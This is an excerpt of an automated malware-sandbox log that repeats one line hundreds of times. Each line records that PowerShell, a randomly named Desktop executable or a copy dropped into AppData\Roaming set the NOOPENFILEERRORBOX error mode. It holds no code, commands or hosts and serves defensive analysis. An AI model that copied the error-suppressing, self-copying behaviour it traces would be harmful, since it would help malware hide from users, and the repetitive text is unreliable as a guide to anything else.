Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
